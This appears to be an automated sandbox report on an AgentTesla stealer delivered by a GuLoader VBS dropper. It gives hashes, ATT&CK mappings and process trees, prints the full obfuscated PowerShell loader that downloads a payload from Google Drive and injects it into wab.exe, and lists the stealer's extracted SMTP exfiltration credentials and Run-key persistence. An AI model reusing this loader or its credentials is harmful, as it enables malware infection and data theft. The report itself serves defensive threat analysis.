agenttesla | afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da

General

Target

20220830_ProtecoPTE..vbs
Size

8KB
MD5

a0ea5a34494368d9e1375f1e5990fdaf
SHA1

54045ae962c9bdd612a9be947442086fc5bcd44c
SHA256

afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da
SHA512

fd7510ee1a0de297c9d4fab4ac7df7f6af7b5aa201d38773aef881ecf766af8d9ecdd4a0958edfced900d416e977a099b351272a8e26698850f0263e86d96ebd
SSDEEP

192:spKsbUuCUwy2riaB/Y4Bf7f102btBF8uDrq0wVHZsPpsp/dp93KqcMd5JQmJr9Pv:spKsbUuCUwyIiu/xfB0itv84rTm5gsxV

Score

10^/10

agenttesla guloader downloader keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.cash4cars.nz
Port:
587
Username:
[email protected]
Password:
logs2024!
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2016 powershell.exe
7 2016 powershell.exe

flow	pid	process
5	2016	powershell.exe
7	2016	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

wab.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\newfile = "C:\\Users\\Admin\\AppData\\Roaming\\newfile\\newfile.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
9 drive.google.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2760 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2432 powershell.exe
2760 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2432 set thread context of 2760 2432 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2016 powershell.exe
2432 powershell.exe
2432 powershell.exe
2760 wab.exe
2760 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2432 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2016 powershell.exe
Token: SeDebugPrivilege 2432 powershell.exe
Token: SeDebugPrivilege 2760 wab.exe

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

flow	ioc
13	ip-api.com

pid	process
2760	wab.exe

pid	process
2432	powershell.exe
2760	wab.exe

description	pid	process	target process
PID 2432 set thread context of 2760	2432	powershell.exe	wab.exe

pid	process
2016	powershell.exe
2432	powershell.exe
2432	powershell.exe
2760	wab.exe
2760	wab.exe

pid	process
2432	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2760	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2036 wrote to memory of 2016	2036	WScript.exe	powershell.exe
PID 2036 wrote to memory of 2016	2036	WScript.exe	powershell.exe
PID 2036 wrote to memory of 2016	2036	WScript.exe	powershell.exe
PID 2016 wrote to memory of 2548	2016	powershell.exe	cmd.exe
PID 2016 wrote to memory of 2548	2016	powershell.exe	cmd.exe
PID 2016 wrote to memory of 2548	2016	powershell.exe	cmd.exe
PID 2016 wrote to memory of 2432	2016	powershell.exe	powershell.exe
PID 2016 wrote to memory of 2432	2016	powershell.exe	powershell.exe
PID 2016 wrote to memory of 2432	2016	powershell.exe	powershell.exe
PID 2016 wrote to memory of 2432	2016	powershell.exe	powershell.exe
PID 2432 wrote to memory of 2228	2432	powershell.exe	cmd.exe
PID 2432 wrote to memory of 2228	2432	powershell.exe	cmd.exe
PID 2432 wrote to memory of 2228	2432	powershell.exe	cmd.exe
PID 2432 wrote to memory of 2228	2432	powershell.exe	cmd.exe
PID 2432 wrote to memory of 2760	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 2760	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 2760	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 2760	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 2760	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 2760	2432	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20220830_ProtecoPTE..vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Geleddernes = 1;$Arbejdsdatabasen='Substrin';$Arbejdsdatabasen+='g';Function Inangulate79($Entrechat){$Pakkeliste=$Entrechat.Length-$Geleddernes;For($Pensionsreglerne=5; $Pensionsreglerne -lt $Pakkeliste; $Pensionsreglerne+=(6)){$Sommerlejre+=$Entrechat.$Arbejdsdatabasen.Invoke($Pensionsreglerne, $Geleddernes);}$Sommerlejre;}function Foreprovided($Saddelmagervrkstedet){. ($Saarbarheds) ($Saddelmagervrkstedet);}$Brookless=Inangulate79 ' ybarMSat rorabboz .ordi Saa,l .osalDioceaTorre/ Orde5Benzo. L,ri0P,yto Dyste(BdetaWOptimiHolomnS raydKir.eoTr phwOkto,s ver BaglyNPullbTAffin V tha1.rone0Kniv,.Uder 0 Phot; Srud ForbrWregneiJernbn ,ant6Menne4Delta;Gnu.b BajoxSt.rk6Komma4Reper; Utro SysterSnesevGodtg:Hjemg1Troml2agen,1Spr n.Fence0N.ate)Vej,e Unw,G Bo ke Ha kcNoniskUnpeaoRetro/Ponde2chemo0Tabu 1Fag l0Biang0 Emen1Nonop0Cl.pp1Skide OffenFJuniaiBu lirbetonejannyfDelusoCon,ex P,og/ rig.1Cris.2Siles1Tumul..ucci0 Hand ';$Prosektor=Inangulate79 'UtilfUAnanisMi roeMillirKup.a- ShesASkgekgBrickeSvrvgn Kla t C.mm ';$Skridtmaaleres=Inangulate79 '.rveoh crett ithot Myt pKarets Ko.r:.etor/ Assi/ ParadRegior fag iBurblvEmotiePrigg.KambagKrebioMonzoo Platgcoultl.refieTelet.Ti recForfaoSkjormastra/kravluPse dcUnder?,opoge .kanxTanklpAcredoMiddlrPerist G us=Perfod CocaoShirtwBage.nHyleglSmle oknoc.aZoomedDuckp&Gal,ci,nhumd norm=Copul1SdendcGlimm4Bver,JKaffeFUndev6Misd,w R.pa3Flamm0Mark.tPy.rocB.skamRigleCHet rpAmovaX ofagJ Filmmtr,inO.inlaBOverfj.hikahNoncozS ereGan gnvEcca 8 Ulst9 Unafrga,mawBriss2Venstx datoDTrfsie petatunimb ';$Amianthus=Inangulate79 'Raadi>a.amn ';$Saarbarheds=Inangulate79 'BajerichriseUfdtbxAnt.b ';$Krystalfrekvensen='Burds';Foreprovided (Inangulate79 ' StirSSoloeeDa.hntLeuco-RimpiC EkstoMelodn Adalt di,seBlegvn SkrmtIrrec Finla-behanPDeputaCaladtFiredh nro KanawTSeko : Tale\GrockK EyesoTematnDi tak .npeu Ps.ur Ve,sr Fo,seLejrsnFanfoc ,enneHippis Shi aLingumSu.dhf .lmiutikmpnSagfrdS.riaeGoodwnPyxeseKolonsFr sn.ChemotWarmnx InsetTagvi endw-Flyv,V IrreaCentrlUdbliuToothe Grei nontr$PrdisKUltrarPri,tyS agts Ba nt Su,ea ksemlCar if Favor ch.leSupinkMelanven ereSammenHovedsCosmee,acspnNelso; Skro ');Foreprovided (Inangulate79 'F.rreiBlgetf Fami E,str(Gl.ttt K,zaeFravasLuccatLeat,-zuniap,ranuaChapotTrifoh Krn FilhTPhola:Stads\Co peKWrabboLrebrnM,juskMozamuBetaerOrdinrPr.sseBoraznKaldecAnmeleT,angsMimera CathmMullafSvmmeuSem,nn ErfadKalkpe enmanHeksee Ov rsRes e. Pedet Tur.xConc,t R,pe) Aphi{sweete Pyl,x binsioutfetAldol}Lands;Gerr ');$judaica = Inangulate79 ' AnedeFlagac Re.ohDatacoHidr oxyd %BarbeaNinnipD terpStvekdOktaeaNotostPo.tnaSeatm% pslu\Ud.oeSPiarot Ora.iKinespEksprpWe.ldl Ba.te Domed Lnov1Forva0Armar7Mimic.BekliuSkyggn .none Jord Krepn&Orbic&Gulvm ataxoePeriecSlughh Stero Gas Angaa$Diabe ';Foreprovided (Inangulate79 'Sk kl$sharpg Besml TppeoL.dssbDisk,aBlitzlSpiri:KlappFNegleaTordelcaprilPhysioStenzs brnde ismarM.ress Mrke1glass6Porte9Rogat=Riob (AnthocNonb.mSpecidMenin Banne/Tinsoc onul Milie$Trindjcivilu ummad UnsoaMilieiRukanc .ineaKonst)Garne ');Foreprovided (Inangulate79 'Skudd$ lbegCemenlOveruoBil,obMoralaSonorlRejoi:DiskeEpartiuStavrbWapsda SoutcA,rodtFrikeeR giorki hoiTeazeuHu rmm stra=Dkke.$PewinSFlarykD,ssorDanewikkkendR,ichtDiagnmTsninaKejs,a.nosclAfk ve,irglrKlargeBegynsDe,ig. Babys.ilhapUnderlCu.tii PhiatUnde (Travh$Phen,ASmud mCom,liV lutaE,ghtnPluknt FredhVaginu alkus,reel)Dimpl ');$Skridtmaaleres=$Eubacterium[0];Foreprovided (Inangulate79 'Venek$Generg SyntlP.oduoS.raybHusm,a.rokllHvlej:sammeOTr,sovVisuaeCata,rNone.iHane,sQuinieDublx1Le.es0 Prer6Ne ha= H.nsN Earie B,omwTrakt-PairpORivinbPhialjFremmebr.kic OvertPour, nonpaSCaloryIn,ogsVaa et Sp neOvenpmGonoc.PleisN.jlfoeAutovtFemka.U sttWDepeneundstbVgtklC JustlFl,keiPetraeLutten,nstatMetha ');Foreprovided (Inangulate79 'Lysaa$ BiorOMuzakv Un.oePrivar CentiNotatsUdsoneSitop1Slavo0 Syer6,reco.martyH Dy.meBa.eaaUnarcdFreg,eCivilrSignasRevol[,lves$sladrP Udb,rIndenoPsychs Tw,neexpirkUns,atBa lvo OverrSpise]Norma= kend$DanskBAlbinrTotaloangstoDedikkTotr,lPig,teNon.ysFamilsQ.esa ');$Sew=Inangulate79 '.yrenOPropovsaliceLsketrMusiciRh,mnsVrtsle err1Kuppe0Anfre6Udha .ParkiDProgroMad owScrolnSocialGladdoSaddea Inged MuroF sub,iMercalOrr.peInane(Conte$ReheaSSrb skSludfrBeraaiPer.pdFrafatCacogmPoi taOmostaUdplal retreJournrDenedeStdpus Stou,K,rak$PerfoP ShoohTabelo UnmerChafeoCavalmSp.oge ProctMot rr Pibeyforsp)s,otg ';$Sew=$Fallosers169[1]+$Sew;$Phorometry=$Fallosers169[0];Foreprovided (Inangulate79 'Ensre$formagSkottl.oinmo TaffbPamflaidnerlInflu:LagenbbyzonoOve,fvHodadiAfgannprivaiTrametYeggsiidrt,eReg osForst= ,las(KnottT Vadeesti.esCinchtLandb-Gr.seP TastaBilagtSynk,h.rest Jordl$ UndeP PlanhMagneo ,litr L,cho estam redde AlvetSidstrDicyey Atta)Be lu ');while (!$bovinities) {Foreprovided (Inangulate79 'Mo,by$Jenkog aretlStorkoSlgtsbholliaCharaltr pe: ErhvMDempnoEksplrUds,urNonrahTran u.aratiDiscon unta= .ang$ an.ltLegemrGeniau Systede ut ') ;Foreprovided $Sew;Foreprovided (Inangulate79 'Saml.SAabnit,ereoaC,nstr Toggtmis,r-.abriSV.llulKlicheFristeI,aqip Nege unim4 Town ');Foreprovided (Inangulate79 'Slugg$umenngtypeblout,hoIndsibPrcisaSystel nmak:guldebM.todoTo.mavL,tiniMundsnflintikloaktReligi He.leH tersZebue=,ight( StabTAmmoneHu drslavistS.ran-Be krPCirkuaRig.ut Tak h,kste Kolpo$SuberPVelathPamfloBiogerL.geboAgricmNatureAftaltHaulerRespoyAkkum)G.ads ') ;Foreprovided (Inangulate79 ' slid$Abst.gAutoflGladiodiaclb obliaAntirl ronk:SprutCG.insagutterRootln Equii Aaref FrysiToolseProvod Genn1Stabe9 Uund3 Hule=Iyars$Re,stgFeelilSpildoMask bTurnpaLog.elBill,:Lay,uSBrus.l MiskyMindenI ritgNonv,nGugleiBarr.nestaegTrunceScenorErysinEmbede ,jansDataf+Exfig+Slagv%Stddm$J,tbrEFunktuMe asbTekniaJunnicYanintPre,leBrin rInexpi Dobbu Ove mFonom.CulotcRredfo Unduu,aston CametKl.ch ') ;$Skridtmaaleres=$Eubacterium[$Carnified193];}Foreprovided (Inangulate79 'Histo$blankgUngsklJagtro.kolebTopotaBeslulK.nku:BlaffPOverroAfr,asPaatvtSkyllv DisksD.coynExtroeT.oppr Aco Skri=Feebl SkurkGsoundeSkilrtlyric-GeomoCAng loSupernDimplt AkvaeHardenUni,vtB.nda Kash$F.ambPSe arh.yskoo neutrAllisoYark,mGtevieKildetmoderrV entyVmmel ');Foreprovided (Inangulate79 ' Opr $EvanggUnhoilArango .atrbUdboraDac,slHea.e: saliGHa edoChalcl GraagCer.uo Hnget confh .iruaSeng, Pall=Grano Nyczi[Torp SForsky.attesAlephtDommeeMast,mL.ere.IndolCSte.ioproexnBrnevv IndueKurisrDechitBesae] U me: Bris:IliasFKlo srImmi,oBub.em ap.eB PantaNonassdepileEro.i6Squas4Posi SAcrotttransr previ.entrnGn,isg nacc(Stabl$InterPBloodoOmfatsPill,tBjld.v I,cis Aul.nL,onseGunshrSenat)Brygg ');Foreprovided (Inangulate79 'Opslu$TrykkgRoughlTilgoo ranibCowpea helolkodev:SpidsFUnderi,atursHyl,ekBriefeOfferrFejltiKronefMonseoSkyldrdowngefoedtnther.iPaladnirreggFagu sUnloo Squin= Peri No fr[OverpS K.ttyPhalasSkibstS ruteMidermstre,.Bra iTLenete DdbixDorsetStan.. Ac,oEBiomenSi,elcZaphroAlcaydMu,hmi SpecnDiaphgTankb]Hagge:Manip:Klum AOverbSCh.moCFor aIPomacINoume.acemiGankuse,megmt Lat S.ndertKynikr s.ppiGear,ndynamgBr.kk(Het r$OutgaGSvejsoBethrlF,erbgU tado AdretUnthehUnneeaAhnfe) f,gk ');Foreprovided (Inangulate79 ' Anke$Col,ngLavrylJasteo MellbFrosca ndelPosta:,aiwaORetsvvFuldte AnnorImparbAnmela relir ManorIoanneWilkin ermwn oghaeCac ds ndss Hern=Disse$T lsmF MuriiAfbl,s VagtkDeli.ePyxidr ouldiTraumfRaglaoUn,errMa.cee Fa.dnT.btyianal nPaestgAspresUdv,k.PlatysEstruuRemoobBinyrsDisd.tBeraprI turiMarmonEks ogLiefl(Repti3 Sulf2T,pht1 Vitu2Han.a6 onde9centr,Klutz2Excul8Eksek7Strep7.tepg0Pan u)Kenss ');Foreprovided $Overbarrenness;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stippled107.une && echo $"
3⤵
PID:2548

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Geleddernes = 1;$Arbejdsdatabasen='Substrin';$Arbejdsdatabasen+='g';Function Inangulate79($Entrechat){$Pakkeliste=$Entrechat.Length-$Geleddernes;For($Pensionsreglerne=5; $Pensionsreglerne -lt $Pakkeliste; $Pensionsreglerne+=(6)){$Sommerlejre+=$Entrechat.$Arbejdsdatabasen.Invoke($Pensionsreglerne, $Geleddernes);}$Sommerlejre;}function Foreprovided($Saddelmagervrkstedet){. ($Saarbarheds) ($Saddelmagervrkstedet);}$Brookless=Inangulate79 ' ybarMSat rorabboz .ordi Saa,l .osalDioceaTorre/ Orde5Benzo. L,ri0P,yto Dyste(BdetaWOptimiHolomnS raydKir.eoTr phwOkto,s ver BaglyNPullbTAffin V tha1.rone0Kniv,.Uder 0 Phot; Srud ForbrWregneiJernbn ,ant6Menne4Delta;Gnu.b BajoxSt.rk6Komma4Reper; Utro SysterSnesevGodtg:Hjemg1Troml2agen,1Spr n.Fence0N.ate)Vej,e Unw,G Bo ke Ha kcNoniskUnpeaoRetro/Ponde2chemo0Tabu 1Fag l0Biang0 Emen1Nonop0Cl.pp1Skide OffenFJuniaiBu lirbetonejannyfDelusoCon,ex P,og/ rig.1Cris.2Siles1Tumul..ucci0 Hand ';$Prosektor=Inangulate79 'UtilfUAnanisMi roeMillirKup.a- ShesASkgekgBrickeSvrvgn Kla t C.mm ';$Skridtmaaleres=Inangulate79 '.rveoh crett ithot Myt pKarets Ko.r:.etor/ Assi/ ParadRegior fag iBurblvEmotiePrigg.KambagKrebioMonzoo Platgcoultl.refieTelet.Ti recForfaoSkjormastra/kravluPse dcUnder?,opoge .kanxTanklpAcredoMiddlrPerist G us=Perfod CocaoShirtwBage.nHyleglSmle oknoc.aZoomedDuckp&Gal,ci,nhumd norm=Copul1SdendcGlimm4Bver,JKaffeFUndev6Misd,w R.pa3Flamm0Mark.tPy.rocB.skamRigleCHet rpAmovaX ofagJ Filmmtr,inO.inlaBOverfj.hikahNoncozS ereGan gnvEcca 8 Ulst9 Unafrga,mawBriss2Venstx datoDTrfsie petatunimb ';$Amianthus=Inangulate79 'Raadi>a.amn ';$Saarbarheds=Inangulate79 'BajerichriseUfdtbxAnt.b ';$Krystalfrekvensen='Burds';Foreprovided (Inangulate79 ' StirSSoloeeDa.hntLeuco-RimpiC EkstoMelodn Adalt di,seBlegvn SkrmtIrrec Finla-behanPDeputaCaladtFiredh nro KanawTSeko : Tale\GrockK EyesoTematnDi tak .npeu Ps.ur Ve,sr Fo,seLejrsnFanfoc ,enneHippis Shi aLingumSu.dhf .lmiutikmpnSagfrdS.riaeGoodwnPyxeseKolonsFr sn.ChemotWarmnx InsetTagvi endw-Flyv,V IrreaCentrlUdbliuToothe Grei nontr$PrdisKUltrarPri,tyS agts Ba nt Su,ea ksemlCar if Favor ch.leSupinkMelanven ereSammenHovedsCosmee,acspnNelso; Skro ');Foreprovided (Inangulate79 'F.rreiBlgetf Fami E,str(Gl.ttt K,zaeFravasLuccatLeat,-zuniap,ranuaChapotTrifoh Krn FilhTPhola:Stads\Co peKWrabboLrebrnM,juskMozamuBetaerOrdinrPr.sseBoraznKaldecAnmeleT,angsMimera CathmMullafSvmmeuSem,nn ErfadKalkpe enmanHeksee Ov rsRes e. Pedet Tur.xConc,t R,pe) Aphi{sweete Pyl,x binsioutfetAldol}Lands;Gerr ');$judaica = Inangulate79 ' AnedeFlagac Re.ohDatacoHidr oxyd %BarbeaNinnipD terpStvekdOktaeaNotostPo.tnaSeatm% pslu\Ud.oeSPiarot Ora.iKinespEksprpWe.ldl Ba.te Domed Lnov1Forva0Armar7Mimic.BekliuSkyggn .none Jord Krepn&Orbic&Gulvm ataxoePeriecSlughh Stero Gas Angaa$Diabe ';Foreprovided (Inangulate79 'Sk kl$sharpg Besml TppeoL.dssbDisk,aBlitzlSpiri:KlappFNegleaTordelcaprilPhysioStenzs brnde ismarM.ress Mrke1glass6Porte9Rogat=Riob (AnthocNonb.mSpecidMenin Banne/Tinsoc onul Milie$Trindjcivilu ummad UnsoaMilieiRukanc .ineaKonst)Garne ');Foreprovided (Inangulate79 'Skudd$ lbegCemenlOveruoBil,obMoralaSonorlRejoi:DiskeEpartiuStavrbWapsda SoutcA,rodtFrikeeR giorki hoiTeazeuHu rmm stra=Dkke.$PewinSFlarykD,ssorDanewikkkendR,ichtDiagnmTsninaKejs,a.nosclAfk ve,irglrKlargeBegynsDe,ig. Babys.ilhapUnderlCu.tii PhiatUnde (Travh$Phen,ASmud mCom,liV lutaE,ghtnPluknt FredhVaginu alkus,reel)Dimpl ');$Skridtmaaleres=$Eubacterium[0];Foreprovided (Inangulate79 'Venek$Generg SyntlP.oduoS.raybHusm,a.rokllHvlej:sammeOTr,sovVisuaeCata,rNone.iHane,sQuinieDublx1Le.es0 Prer6Ne ha= H.nsN Earie B,omwTrakt-PairpORivinbPhialjFremmebr.kic OvertPour, nonpaSCaloryIn,ogsVaa et Sp neOvenpmGonoc.PleisN.jlfoeAutovtFemka.U sttWDepeneundstbVgtklC JustlFl,keiPetraeLutten,nstatMetha ');Foreprovided (Inangulate79 'Lysaa$ BiorOMuzakv Un.oePrivar CentiNotatsUdsoneSitop1Slavo0 Syer6,reco.martyH Dy.meBa.eaaUnarcdFreg,eCivilrSignasRevol[,lves$sladrP Udb,rIndenoPsychs Tw,neexpirkUns,atBa lvo OverrSpise]Norma= kend$DanskBAlbinrTotaloangstoDedikkTotr,lPig,teNon.ysFamilsQ.esa ');$Sew=Inangulate79 '.yrenOPropovsaliceLsketrMusiciRh,mnsVrtsle err1Kuppe0Anfre6Udha .ParkiDProgroMad owScrolnSocialGladdoSaddea Inged MuroF sub,iMercalOrr.peInane(Conte$ReheaSSrb skSludfrBeraaiPer.pdFrafatCacogmPoi taOmostaUdplal retreJournrDenedeStdpus Stou,K,rak$PerfoP ShoohTabelo UnmerChafeoCavalmSp.oge ProctMot rr Pibeyforsp)s,otg ';$Sew=$Fallosers169[1]+$Sew;$Phorometry=$Fallosers169[0];Foreprovided (Inangulate79 'Ensre$formagSkottl.oinmo TaffbPamflaidnerlInflu:LagenbbyzonoOve,fvHodadiAfgannprivaiTrametYeggsiidrt,eReg osForst= ,las(KnottT Vadeesti.esCinchtLandb-Gr.seP TastaBilagtSynk,h.rest Jordl$ UndeP PlanhMagneo ,litr L,cho estam redde AlvetSidstrDicyey Atta)Be lu ');while (!$bovinities) {Foreprovided (Inangulate79 'Mo,by$Jenkog aretlStorkoSlgtsbholliaCharaltr pe: ErhvMDempnoEksplrUds,urNonrahTran u.aratiDiscon unta= .ang$ an.ltLegemrGeniau Systede ut ') ;Foreprovided $Sew;Foreprovided (Inangulate79 'Saml.SAabnit,ereoaC,nstr Toggtmis,r-.abriSV.llulKlicheFristeI,aqip Nege unim4 Town ');Foreprovided (Inangulate79 'Slugg$umenngtypeblout,hoIndsibPrcisaSystel nmak:guldebM.todoTo.mavL,tiniMundsnflintikloaktReligi He.leH tersZebue=,ight( StabTAmmoneHu drslavistS.ran-Be krPCirkuaRig.ut Tak h,kste Kolpo$SuberPVelathPamfloBiogerL.geboAgricmNatureAftaltHaulerRespoyAkkum)G.ads ') ;Foreprovided (Inangulate79 ' slid$Abst.gAutoflGladiodiaclb obliaAntirl ronk:SprutCG.insagutterRootln Equii Aaref FrysiToolseProvod Genn1Stabe9 Uund3 Hule=Iyars$Re,stgFeelilSpildoMask bTurnpaLog.elBill,:Lay,uSBrus.l MiskyMindenI ritgNonv,nGugleiBarr.nestaegTrunceScenorErysinEmbede ,jansDataf+Exfig+Slagv%Stddm$J,tbrEFunktuMe asbTekniaJunnicYanintPre,leBrin rInexpi Dobbu Ove mFonom.CulotcRredfo Unduu,aston CametKl.ch ') ;$Skridtmaaleres=$Eubacterium[$Carnified193];}Foreprovided (Inangulate79 'Histo$blankgUngsklJagtro.kolebTopotaBeslulK.nku:BlaffPOverroAfr,asPaatvtSkyllv DisksD.coynExtroeT.oppr Aco Skri=Feebl SkurkGsoundeSkilrtlyric-GeomoCAng loSupernDimplt AkvaeHardenUni,vtB.nda Kash$F.ambPSe arh.yskoo neutrAllisoYark,mGtevieKildetmoderrV entyVmmel ');Foreprovided (Inangulate79 ' Opr $EvanggUnhoilArango .atrbUdboraDac,slHea.e: saliGHa edoChalcl GraagCer.uo Hnget confh .iruaSeng, Pall=Grano Nyczi[Torp SForsky.attesAlephtDommeeMast,mL.ere.IndolCSte.ioproexnBrnevv IndueKurisrDechitBesae] U me: Bris:IliasFKlo srImmi,oBub.em ap.eB PantaNonassdepileEro.i6Squas4Posi SAcrotttransr previ.entrnGn,isg nacc(Stabl$InterPBloodoOmfatsPill,tBjld.v I,cis Aul.nL,onseGunshrSenat)Brygg ');Foreprovided (Inangulate79 'Opslu$TrykkgRoughlTilgoo ranibCowpea helolkodev:SpidsFUnderi,atursHyl,ekBriefeOfferrFejltiKronefMonseoSkyldrdowngefoedtnther.iPaladnirreggFagu sUnloo Squin= Peri No fr[OverpS K.ttyPhalasSkibstS ruteMidermstre,.Bra iTLenete DdbixDorsetStan.. Ac,oEBiomenSi,elcZaphroAlcaydMu,hmi SpecnDiaphgTankb]Hagge:Manip:Klum AOverbSCh.moCFor aIPomacINoume.acemiGankuse,megmt Lat S.ndertKynikr s.ppiGear,ndynamgBr.kk(Het r$OutgaGSvejsoBethrlF,erbgU tado AdretUnthehUnneeaAhnfe) f,gk ');Foreprovided (Inangulate79 ' Anke$Col,ngLavrylJasteo MellbFrosca ndelPosta:,aiwaORetsvvFuldte AnnorImparbAnmela relir ManorIoanneWilkin ermwn oghaeCac ds ndss Hern=Disse$T lsmF MuriiAfbl,s VagtkDeli.ePyxidr ouldiTraumfRaglaoUn,errMa.cee Fa.dnT.btyianal nPaestgAspresUdv,k.PlatysEstruuRemoobBinyrsDisd.tBeraprI turiMarmonEks ogLiefl(Repti3 Sulf2T,pht1 Vitu2Han.a6 onde9centr,Klutz2Excul8Eksek7Strep7.tepg0Pan u)Kenss ');Foreprovided $Overbarrenness;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stippled107.une && echo $"
4⤵
PID:2228

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RKYJOMM4D7GY58ZH1DK1.temp
Filesize
7KB

MD5
848aa6aaa12659bdd3692f6a4f13a33f

SHA1
32651a2fe21004ac2cc7623247da729ea3966816

SHA256
28094f1a07f1d56471c0cdb2d7c13e949d4f33eaf423a907b48300cc0e92cb93

SHA512
8ee37c2f17d6248e7e8fc151464bba6e3b7a51c9b4d1e8e5ae81b8c7deb2256fde6559fb75b1eb672faaaa50c287f7ade835c70d58282cdfd36302a8957f6320

Download Submit
C:\Users\Admin\AppData\Roaming\Stippled107.une
Filesize
455KB

MD5
de5eef13f471d82f8dead40c25baa691

SHA1
ba5233bae79d4d3fb4796c7d8b26fb3363bd0f09

SHA256
630c6a75d9d33f1e8a423918212b124c5dda599596f4bf83af00d049021392c3

SHA512
d9f3f940003c0edb5ed4a46d8a453700450738727817f53be5e63e2f3da84ba23fa4a674a434eb8f54af9b52354d721d37d621c5fcf50919f8d0bcf6de9e2112

Download Submit
memory/2016-9-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2016-8-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/2016-6-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2016-10-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/2016-22-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/2016-7-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/2016-66-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2016-4-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2016-26-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/2016-24-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/2016-19-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2016-23-0x00000000027D0000-0x0000000002850000-memory.dmp

Filesize
512KB

Download
memory/2016-5-0x0000000002A70000-0x0000000002A78000-memory.dmp

Filesize
32KB

Download
memory/2432-27-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download
memory/2432-29-0x0000000006640000-0x000000000855F000-memory.dmp

Filesize
31.1MB

Download
memory/2432-18-0x0000000002BB0000-0x0000000002BF0000-memory.dmp

Filesize
256KB

Download
